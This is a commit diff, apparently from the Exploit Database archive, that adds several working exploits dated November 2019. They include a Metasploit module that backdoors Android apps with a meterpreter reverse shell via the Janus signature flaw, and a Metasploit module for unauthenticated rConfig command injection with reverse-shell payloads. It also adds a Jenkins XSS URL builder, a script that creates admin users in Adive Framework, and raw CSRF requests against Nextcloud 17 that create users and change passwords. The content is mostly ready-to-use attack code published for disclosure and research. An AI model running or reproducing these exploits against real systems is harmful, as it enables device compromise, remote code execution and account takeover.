DB: 2019-11-09

6 changes to exploits/shellcodes SolarWinds Kiwi Syslog Server 8.3.52 - 'Kiwi Syslog Server' Unquoted Service Path Android Janus - APK Signature Bypass (Metasploit) rConfig - install Command Execution (Metasploit) Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting Adive Framework 2.0.7 - Privilege Escalation Nextcloud 17 - Cross-Site Request Forgery
2019-11-09 05:01:40 +00:00 · 2019-11-09 05:01:40 +00:00 · b6ed2c7176
commit b6ed2c7176
parent 4ec7754462
7 changed files with 758 additions and 0 deletions
--- a/exploits/android/local/47601.rb
+++ b/exploits/android/local/47601.rb
@ -0,0 +1,162 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core/payload/apk'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ManualRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::Post::File
+  include Msf::Post::Android::Priv
+  include Msf::Payload::Android
+
+  def initialize(info={})
+    super( update_info( info, {
+      'Name'           => "Android Janus APK Signature bypass",
+      'Description'    => %q{
+        This module exploits CVE-2017-13156 in Android to install a payload into another
+        application. The payload APK will have the same signature and can be installed
+        as an update, preserving the existing data.
+        The vulnerability was fixed in the 5th December 2017 security patch, and was
+        additionally fixed by the APK Signature scheme v2, so only APKs signed with
+        the v1 scheme are vulnerable.
+        Payload handler is disabled, and a multi/handler must be started first.
+      },
+      'Author'         => [
+        'GuardSquare', # discovery
+        'V-E-O',       # proof of concept
+        'timwr',       # metasploit module
+        'h00die',      # metasploit module
+      ],
+      'References'     => [
+        [ 'CVE', '2017-13156' ],
+        [ 'URL', 'https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures' ],
+        [ 'URL', 'https://github.com/V-E-O/PoC/tree/master/CVE-2017-13156' ],
+      ],
+      'DisclosureDate' => 'Jul 31 2017',
+      'SessionTypes'   => [ 'meterpreter' ],
+      'Platform'       => [ 'android' ],
+      'Arch'           => [ ARCH_DALVIK ],
+      'Targets'        => [ [ 'Automatic', {} ] ],
+      'DefaultOptions' => {
+        'PAYLOAD' => 'android/meterpreter/reverse_tcp',
+        'AndroidWakelock' => false, # the target may not have the WAKE_LOCK permission
+        'DisablePayloadHandler' => true,
+      },
+      'DefaultTarget'  => 0,
+      'Notes' => {
+        'SideEffects' => ['ARTIFACTS_ON_DISK', 'SCREEN_EFFECTS'],
+        'Stability' => ['SERVICE_RESOURCE_LOSS'], # ZTE youtube app won't start anymore
+      }
+    }))
+    register_options([
+      OptString.new('PACKAGE', [true, 'The package to target, or ALL to attempt all', 'com.phonegap.camerasample']),
+    ])
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+    ]
+  end
+
+  def check
+    os = cmd_exec("getprop ro.build.version.release")
+    unless Gem::Version.new(os).between?(Gem::Version.new('5.1.1'), Gem::Version.new('8.0.0'))
+      vprint_error "Android version #{os} is not vulnerable."
+      return CheckCode::Safe
+    end
+    vprint_good "Android version #{os} appears to be vulnerable."
+
+    patch = cmd_exec('getprop ro.build.version.security_patch')
+    if patch.empty?
+      print_status 'Unable to determine patch level.  Pre-5.0 this is unaccessible.'
+    elsif patch > '2017-12-05'
+      vprint_error "Android security patch level #{patch} is patched."
+      return CheckCode::Safe
+    else
+      vprint_good "Android security patch level #{patch} is vulnerable"
+    end
+
+    CheckCode::Appears
+  end
+
+  def exploit
+
+    def infect(apkfile)
+      unless apkfile.start_with?("package:")
+        fail_with Failure::BadConfig, 'Unable to locate app apk'
+      end
+      apkfile = apkfile[8..-1]
+      print_status "Downloading APK: #{apkfile}"
+      apk_data = read_file(apkfile)
+
+      begin
+        # Create an apk with the payload injected
+        apk_backdoor = ::Msf::Payload::Apk.new
+        apk_zip = apk_backdoor.backdoor_apk(nil, payload.encoded, false, false, apk_data, false)
+
+        # Extract the classes.dex
+        dex_data = ''
+        Zip::File.open_buffer(apk_zip) do |zipfile|
+          dex_data = zipfile.read("classes.dex")
+        end
+        dex_size = dex_data.length
+
+        # Fix the original APKs zip file code directory
+        cd_end_addr = apk_data.rindex("\x50\x4b\x05\x06")
+        cd_start_addr = apk_data[cd_end_addr+16, cd_end_addr+20].unpack("V")[0]
+        apk_data[cd_end_addr+16...cd_end_addr+20] = [ cd_start_addr+dex_size ].pack("V")
+        pos = cd_start_addr
+        while pos && pos < cd_end_addr
+          offset = apk_data[pos+42, pos+46].unpack("V")[0]
+          apk_data[pos+42...pos+46] = [ offset+dex_size ].pack("V")
+          pos = apk_data.index("\x50\x4b\x01\x02", pos+46)
+        end
+
+        # Prepend the new classes.dex to the apk
+        out_data = dex_data + apk_data
+        out_data[32...36] = [ out_data.length ].pack("V")
+        out_data = fix_dex_header(out_data)
+
+        out_apk = "/sdcard/#{Rex::Text.rand_text_alphanumeric 6}.apk"
+        print_status "Uploading APK: #{out_apk}"
+        write_file(out_apk, out_data)
+        register_file_for_cleanup(out_apk)
+        print_status "APK uploaded"
+
+        # Prompt the user to update the APK
+        session.appapi.app_install(out_apk)
+        print_status "User should now have a prompt to install an updated version of the app"
+        true
+      rescue => e
+        print_error e.to_s
+        false
+      end
+    end
+
+    unless [CheckCode::Detected, CheckCode::Appears].include? check
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if datastore["PACKAGE"] == 'ALL'
+      vprint_status('Finding installed packages (this can take a few minutes depending on list of installed packages)')
+      apkfiles = []
+      all = cmd_exec("pm list packages").split("\n")
+      c = 1
+      all.each do |package|
+        package = package.split(':')[1]
+        vprint_status("Attempting exploit of apk #{c}/#{all.length} for #{package}")
+        c += 1
+        next if ['com.metasploit.stage', # avoid injecting into ourself
+                ].include? package # This was left on purpose to be expanded as need be for testing
+        result = infect(cmd_exec("pm path #{package}"))
+        break if result
+      end
+    else
+      infect(cmd_exec("pm path #{datastore["PACKAGE"]}"))
+    end
+  end
+end
--- a/exploits/java/webapps/47598.py
+++ b/exploits/java/webapps/47598.py
@ -0,0 +1,44 @@
+# Exploit Title: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting
+# Date: 2019-11-06
+# Exploit Author: vesche (Austin Jackson)
+# Vendor Homepage: https://plugins.jenkins.io/build-metrics
+# Version: Jenkins build-metrics plugin 1.3 and below
+# Tested on: Debian 10 (Buster), Jenkins 2.203 (latest 2019-11-05), and build-metrics 1.3
+# CVE: CVE-2019-10475
+# Write-up: https://github.com/vesche/CVE-2019-10475
+
+#!/usr/bin/env python
+
+import sys
+import argparse
+
+VULN_URL = '''{base_url}/plugin/build-metrics/getBuildStats?label={inject}&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search'''
+
+
+def get_parser():
+    parser = argparse.ArgumentParser(description='CVE-2019-10475')
+    parser.add_argument('-p', '--port', help='port', default=80, type=int)
+    parser.add_argument('-d', '--domain', help='domain', default='localhost', type=str)
+    parser.add_argument('-i', '--inject', help='inject', default='<script>alert("CVE-2019-10475")</script>', type=str)
+    return parser
+
+
+def main():
+    parser = get_parser()
+    args = vars(parser.parse_args())
+    port = args['port']
+    domain = args['domain']
+    inject = args['inject']
+    if port == 80:
+        base_url = f'http://{domain}'
+    elif port == 443:
+        base_url = f'https://{domain}'
+    else:
+        base_url = f'http://{domain}:{port}'
+    build_url = VULN_URL.format(base_url=base_url, inject=inject)
+    print(build_url)
+    return 0
+
+
+if __name__ == '__main__':
+    sys.exit(main())
--- a/exploits/linux/remote/47602.rb
+++ b/exploits/linux/remote/47602.rb
@ -0,0 +1,114 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'rConfig install Command Execution',
+      'Description'    => %q{
+        This module exploits an unauthenticated command injection vulnerability
+        in rConfig versions 3.9.2 and prior. The `install` directory is not
+        automatically removed after installation, allowing unauthenticated users
+        to execute arbitrary commands via the `ajaxServerSettingsChk.php` file
+        as the web server user.
+
+        This module has been tested successfully on rConfig version 3.9.2 on
+        CentOS 7.7.1908 (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'mhaskar', # Discovery and exploit
+          'bcoles'   # Metasploit
+        ],
+      'References'     =>
+        [
+          ['CVE', '2019-16662'],
+          ['EDB', '47555'],
+          ['URL', 'https://gist.github.com/mhaskar/ceb65fa4ca57c3cdccc1edfe2390902e'],
+          ['URL', 'https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/']
+        ],
+      'Platform'       => %w[unix linux],
+      'Arch'           => [ARCH_CMD, ARCH_X86, ARCH_X64],
+      'Payload'        => {'BadChars' => "\x00\x0a\x0d\x26"},
+      'Targets'        =>
+        [
+          ['Automatic (Unix In-Memory)',
+            'Platform'       => 'unix',
+            'Arch'           => ARCH_CMD,
+            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
+            'Type'           => :unix_memory
+          ],
+          ['Automatic (Linux Dropper)',
+            'Platform'       => 'linux',
+            'Arch'           => [ARCH_X86, ARCH_X64],
+            'DefaultOptions' => {'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'},
+            'Type'           => :linux_dropper
+          ]
+        ],
+      'Privileged'     => false,
+      'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 },
+      'DisclosureDate' => '2019-10-28',
+      'DefaultTarget'  => 0))
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to rConfig install directory', '/install/'])
+      ])
+  end
+
+  def check
+    res = execute_command('id')
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    if res.code == 404
+      vprint_error 'Could not find install directory'
+      return CheckCode::Safe
+    end
+
+    cmd_res = res.body.scan(%r{The root details provided have not passed: (.+?)<\\/}).flatten.first
+
+    unless cmd_res
+      return CheckCode::Safe
+    end
+
+    vprint_status "Response: #{cmd_res}"
+
+    unless cmd_res.include?('uid=')
+      return CheckCode::Detected
+    end
+
+    CheckCode::Vulnerable
+  end
+
+  def execute_command(cmd, opts = {})
+    vprint_status "Executing command: #{cmd}"
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxServerSettingsChk.php'),
+      'vars_get' => {'rootUname' => ";#{cmd} #"}
+    }, 5)
+  end
+
+  def exploit
+    unless [CheckCode::Detected, CheckCode::Vulnerable].include? check
+      fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
+    end
+
+    case target['Type']
+    when :unix_memory
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager(:linemax => 1_500)
+    end
+  end
+end
--- a/exploits/php/webapps/47600.py
+++ b/exploits/php/webapps/47600.py
@ -0,0 +1,82 @@
+# Exploit Title: Adive Framework 2.0.7 - Privilege Escalation
+# Date: 2019-08-02
+# Exploit Author: Pablo Santiago
+# Vendor Homepage: https://www.adive.es/
+# Software Link: https://github.com/ferdinandmartin/adive-php7
+# Version: 2.0.7
+# Tested on: Windows 10
+# CVE : CVE-2019-14347
+
+#Exploit
+
+import requests
+import sys
+
+session = requests.Session()
+
+http_proxy  = "http://127.0.0.1:8080"
+https_proxy = "https://127.0.0.1:8080"
+
+proxyDict = {
+             "http"  : http_proxy,
+             "https" : https_proxy
+           }
+print('[*****************************************]')
+print('[ BYPASSING Adive Framework Version.2.0.5 ]')
+print('[*****************************************]''\n')
+
+
+
+print('[+]Login with the correct credentials:' '\n')
+
+user = input('[+]user:')
+password = input('[+]password:')
+print('\n')
+
+url = 'http://localhost/adive/admin/login'
+values = {'user': user,
+          'password': password,
+          }
+
+r = session.post(url, data=values, proxies=proxyDict)
+cookie = session.cookies.get_dict()['PHPSESSID']
+
+print('Your session cookie is:'+ cookie +'\n')
+
+
+host = sys.argv[1]
+print('Create the new user:')
+userName = input('[+]User:')
+userUsername = input('[+]UserName:')
+password = input('[+]Password:')
+password2 = input('[+]Confirm Password:')
+print('The possibles permission are: 1: Administrator, 2: Developer, 3:Editor')
+permission = input('[+]permission:')
+
+if (password == password2):
+#configure proxy burp
+
+#hacer el request para la creacion de usuario
+data = {
+'userName':userName,
+'userUsername':userUsername,
+'pass':password,
+'cpass':password2,
+'permission':permission,
+
+}
+
+headers= {
+'Cookie': 'PHPSESSID='+cookie
+}
+
+request = session.post(host+'/adive/admin/user/add', data=data,
+headers=headers, proxies=proxyDict)
+print('+--------------------------------------------------+')
+
+else:
+print ('Passwords dont match!!!')
+
+#PoC
+https://imgur.com/dUgLYi6
+https://hackpuntes.com/wp-content/uploads/2019/08/ex.gif
--- a/exploits/php/webapps/47603.txt
+++ b/exploits/php/webapps/47603.txt
@ -0,0 +1,314 @@
+# Exploit Title: Nextcloud 17 - Cross-Site Request Forgery
+# Date: 08.11.2019
+# Exploit Author: Ozer Goker
+# Vendor Homepage: https://nextcloud.com
+# Software Link: https://nextcloud.com/install/#instructions-server
+# Version: 17
+# CVE: N/A
+
+
+#Nextcloud offers the industry-leading, on-premises content collaboration
+platform.
+#Our technology combines the convenience and ease of use of consumer-grade
+solutions like Dropbox and Google Drive with the security, privacy and
+control business #needs.
+
+##################################################################################################################################
+
+# CSRF1
+# Create Folder
+
+MKCOL /remote.php/dav/files/ogoker/test HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+requesttoken:
+NBxrV688w2KBVFx/Q+X7LsYUMGKGrj5PFNLDVe5R0bo=:ZXkTEoBkskmuOhU0NN2iab9welrLxlUkZqePH70zg/M=
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
+nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
+
+
+##################################################################################################################################
+
+# CSRF2
+# Delete Folder
+
+DELETE /remote.php/dav/files/ogoker/test HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+requesttoken:
+NBxrV688w2KBVFx/Q+X7LsYUMGKGrj5PFNLDVe5R0bo=:ZXkTEoBkskmuOhU0NN2iab9welrLxlUkZqePH70zg/M=
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
+nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
+
+
+##################################################################################################################################
+
+# CSRF3
+# Create User
+
+POST /ocs/v2.php/cloud/users HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: application/json, text/plain, /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/json;charset=utf-8
+requesttoken:
+qmO6/Dw6+bFv8FXRaFdzbhhzcVHZIGBHtg5riOIp4es=:+wbCuRNiiJpAnhyaH28qKWEXO2mUSAssxHsnwrFLs6I=
+Content-Length: 129
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
+nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
+
+{"userid":"test","password":"test1234","displayName":"","email":"","groups":[],"subadmin":[],"quota":"default","language":"en"}
+
+
+
+##################################################################################################################################
+
+# CSRF4
+# Delete User
+
+DELETE /ocs/v2.php/cloud/users/test HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: application/json, text/plain, /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+requesttoken:
+qmO6/Dw6+bFv8FXRaFdzbhhzcVHZIGBHtg5riOIp4es=:+wbCuRNiiJpAnhyaH28qKWEXO2mUSAssxHsnwrFLs6I=
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
+nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
+
+
+##################################################################################################################################
+
+# CSRF5
+# Disable User
+
+PUT /ocs/v2.php/cloud/users/test/disable HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: application/json, text/plain, /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+requesttoken:
+3uInmrIiv0aGraTESlGJCzqadH5giusD5iZ/GZwxxEQ=:j4df3516zm2pw+2PPWnQTEP+PkYt4oBolFMzU89Tlg0=
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
+nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
+Content-Length: 0
+
+
+##################################################################################################################################
+
+# CSRF6
+# Enable User
+
+PUT /ocs/v2.php/cloud/users/test/enable HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: application/json, text/plain, /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+requesttoken:
+3uInmrIiv0aGraTESlGJCzqadH5giusD5iZ/GZwxxEQ=:j4df3516zm2pw+2PPWnQTEP+PkYt4oBolFMzU89Tlg0=
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+nc_username=ogoker; nc_token=BnzwpedGNoSh8RqQEcU7yAbb6O%2FQReCM;
+nc_session_id=6kkh1f4s3gu80pjk9iclagoqrp; redirect=1; testing=1
+Content-Length: 0
+
+
+##################################################################################################################################
+
+# CSRF7
+# Create Group
+
+POST /ocs/v2.php/cloud/groups HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: application/json, text/plain, /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/json;charset=utf-8
+requesttoken:
+EjdL6QpK1LpIlTtWYWHqEa3p8UKwRqDbBraFa+WWRbE=:Q1IzrCUSpZFn+3IdFlmzVtSNu3r9LsuwdMPJIbb0F/g=
+Content-Length: 18
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+redirect=1; testing=1
+
+{"groupid":"test"}
+
+
+##################################################################################################################################
+
+# CSRF8
+# Delete Group
+
+DELETE /ocs/v2.php/cloud/groups/test HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: application/json, text/plain, /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+requesttoken:
+EjdL6QpK1LpIlTtWYWHqEa3p8UKwRqDbBraFa+WWRbE=:Q1IzrCUSpZFn+3IdFlmzVtSNu3r9LsuwdMPJIbb0F/g=
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+redirect=1; testing=1
+
+
+##################################################################################################################################
+
+# CSRF9
+# Change User Full Name
+
+
+PUT /settings/users/ogoker/settings HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: application/json, text/javascript, /; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/json
+requesttoken:
+nvnWCslz6So+9VRA8Vg8043tt1pf1wL/ysi2ak1J6es=:z5yuT+YrmAERmx0LhmBllPSJ/WISv2mUuL36IB4ru6I=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Content-Length: 266
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+redirect=1; testing=1
+
+{"displayname":"Ozer
+Goker","displaynameScope":"contacts","phone":"","phoneScope":"private","email":"","emailScope":"contacts","website":"","websiteScope":"private","twitter":"","twitterScope":"private","address":"","addressScope":"private","avatarScope":"contacts"}
+
+
+##################################################################################################################################
+
+# CSRF10
+# Change User Email
+
+PUT /settings/users/ogoker/settings HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: application/json, text/javascript, /; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/json
+requesttoken:
+I+6bC+nRvx4TyTudd4pzZrOucr8qlgwe0YE3v13+fOw=:covjTsaJzjU8p3LWALIqIcrKOIdn/md1o/R79Q6cLqU=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Content-Length: 271
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+redirect=1; testing=1
+
+{"displayname":"ogoker","displaynameScope":"contacts","phone":"","phoneScope":"private","email":"test@test
+","emailScope":"contacts","website":"","websiteScope":"private","twitter":"","twitterScope":"private","address":"","addressScope":"private","avatarScope":"contacts"}
+
+
+##################################################################################################################################
+
+# CSRF11
+# Change Language
+
+PUT /ocs/v2.php/cloud/users/ogoker HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+requesttoken:
+mRN2MXrwRQuE/fuQ5PNtyp4ulgYRocB99vbydSi8i+E=:yHYOdFWoNCCrk7Lbk8s0jedK3D5cyasWhIO+P3ve2ag=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Content-Length: 21
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+redirect=1; testing=1
+
+key=language&value=tr
+
+
+##################################################################################################################################
+
+# CSRF12
+# Change User Password
+
+POST /settings/personal/changepassword HTTP/1.1
+Host: 192.168.2.109
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+requesttoken:
+0OhP82O7tEe/0gbwiEPrkFfuU9StyaiXNi0yqg02wT4=:gY03tkzjxWyQvE+7/3uy1y6KGezgocP8RFh+4F5Uk3c=
+OCS-APIREQUEST: true
+X-Requested-With: XMLHttpRequest
+Content-Length: 70
+Connection: close
+Cookie: oc5a107a3xcz=6kkh1f4s3gu80pjk9iclagoqrp;
+oc_sessionPassphrase=W7gmobO%2FJ1ZdAmc4H7seQQvMpT%2BEwXBqNdYdwbq%2BE5P69EgB8188UUBBtMpcb6qmdLVr6t6iqzJ%2F%2F%2FqhDkt86%2FZg%2BSpjkyB9dO2qVLxXpVEZyBtJUj9TQfA6jrXqCA9t;
+__Host-nc_sameSiteCookielax=true; __Host-nc_sameSiteCookiestrict=true;
+redirect=1; testing=1
+
